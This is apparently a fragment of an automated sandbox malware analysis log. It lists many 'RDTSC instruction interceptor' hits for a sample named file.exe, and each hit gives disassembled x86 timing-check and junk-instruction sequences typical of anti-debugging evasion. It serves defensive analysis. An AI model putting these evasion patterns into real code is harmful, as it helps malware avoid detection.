                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4FA2 second address: 10E4FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4FA8 second address: 10E4FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4FAC second address: 10E4FBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4FBE second address: 10E4FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4FC2 second address: 10E4FF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F863914EA52h 0x0000000e jmp 00007F863914EA38h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F863914EA26h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4FF0 second address: 10E4FF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E52B5 second address: 10E52B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF58F second address: 10EF5B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F86385196E7h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EDF7B second address: 10EDF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EDF7F second address: 10EDF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F86385196E8h 0x0000000d jo 00007F86385196E2h 0x00000013 ja 00007F86385196D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE0C5 second address: 10EE0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F863914EA39h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE0E3 second address: 10EE0E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE0E9 second address: 10EE125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F863914EA3Ch 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F863914EA34h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE125 second address: 10EE12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE12B second address: 10EE145 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F863914EA26h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F863914EA2Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEB7C second address: 10EEB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEC99 second address: 10EECB1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F863914EA26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 jns 00007F863914EA26h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EECB1 second address: 10EECB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEE45 second address: 10EEE4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F2786 second address: 10F278A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F278A second address: 10F27AF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F863914EA26h 0x00000008 jmp 00007F863914EA35h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F27AF second address: 10F27B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7F4B second address: 10F7F52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6ECA second address: 10F6ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6ECE second address: 10F6F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F863914EA37h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F863914EA2Dh 0x00000013 jmp 00007F863914EA2Dh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5197 second address: 1096D7E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F86385196E2h 0x00000008 jmp 00007F86385196DCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cmc 0x00000013 call dword ptr [ebp+1245FFAFh] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B566E second address: 10B5696 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F863914EA3Ah 0x00000008 jmp 00007F863914EA34h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 jbe 00007F863914EA2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B57CB second address: 10B57F8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86385196E1h 0x00000008 jmp 00007F86385196DBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 338B656Ch 0x00000016 movsx edx, ax 0x00000019 push 8DD7C700h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007F86385196D6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B57F8 second address: 10B57FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B593F second address: 10B5943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5AB1 second address: 10B5AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5B8F second address: 10B5BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a and cx, 4026h 0x0000000f push 00000004h 0x00000011 sub edx, 6F2A4EAFh 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5BAC second address: 10B5BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F16 second address: 10B5F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F1C second address: 10B5F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F863914EA28h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 call 00007F863914EA2Dh 0x00000028 add ecx, 313EBCA1h 0x0000002e pop edx 0x0000002f push 0000001Eh 0x00000031 mov dword ptr [ebp+122D1D81h], ebx 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F64 second address: 10B5F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F6A second address: 10B5F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F863914EA26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F74 second address: 10B5F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F78 second address: 10B5FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F863914EA35h 0x0000000f pushad 0x00000010 jc 00007F863914EA26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6239 second address: 10B6241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F72F5 second address: 10F72FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F72FB second address: 10F7305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F75D7 second address: 10F75DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F75DF second address: 10F75E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F75E3 second address: 10F7607 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F863914EA26h 0x00000008 jmp 00007F863914EA37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7607 second address: 10F762D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F86385196E6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F762D second address: 10F7631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7B95 second address: 10F7B9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7B9B second address: 10F7BBF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F863914EA3Bh 0x00000008 jmp 00007F863914EA35h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD7E7 second address: 10FD7ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD02D second address: 10FD04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA32h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F863914EA2Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD04E second address: 10FD052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD052 second address: 10FD058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD058 second address: 10FD064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD4F4 second address: 10FD4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD4FA second address: 10FD4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102082 second address: 110209D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F863914EA36h 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110209D second address: 11020A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11021FC second address: 1102203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106823 second address: 1106827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106827 second address: 1106840 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F863914EA2Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106840 second address: 1106846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106846 second address: 110684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105EE6 second address: 1105EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105EEC second address: 1105EFC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F863914EA26h 0x00000008 jns 00007F863914EA26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105EFC second address: 1105F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105F02 second address: 1105F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11061E2 second address: 11061F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11061F1 second address: 11061FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110651A second address: 110651E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110651E second address: 110652C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F863914EA28h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110652C second address: 1106531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073336 second address: 107333C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107333C second address: 107334F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F86385196D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F86385196D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107334F second address: 1073359 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F863914EA26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B085 second address: 110B08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B08B second address: 110B091 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B091 second address: 110B0AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86385196E7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B1EE second address: 110B1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B1F2 second address: 110B1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B1FD second address: 110B203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B367 second address: 110B373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B4B2 second address: 110B4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B4B6 second address: 110B4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B5EE second address: 110B5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5D93 second address: 10B5DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and cl, FFFFFF8Dh 0x0000000d mov ecx, dword ptr [ebp+122D1C75h] 0x00000013 mov ebx, dword ptr [ebp+12486EEDh] 0x00000019 push ecx 0x0000001a xor dword ptr [ebp+122D1B2Ch], eax 0x00000020 pop ecx 0x00000021 add eax, ebx 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F86385196D8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000016h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d jmp 00007F86385196DCh 0x00000042 push esi 0x00000043 mov dh, al 0x00000045 pop edx 0x00000046 nop 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jc 00007F86385196D6h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8A6 second address: 110B8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8AE second address: 110B8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8B4 second address: 110B8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 push esi 0x00000011 jc 00007F863914EA26h 0x00000017 js 00007F863914EA26h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8D2 second address: 110B8DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F86385196D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA23 second address: 110BA36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA36 second address: 110BA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnl 00007F86385196D6h 0x0000000f popad 0x00000010 pushad 0x00000011 jg 00007F86385196D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11132CC second address: 11132D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F863914EA26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113883 second address: 111389E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F86385196DDh 0x0000000d jo 00007F86385196D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111389E second address: 11138A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11138A2 second address: 11138A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113E7B second address: 1113E99 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F863914EA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F863914EA31h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DD8 second address: 1114DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
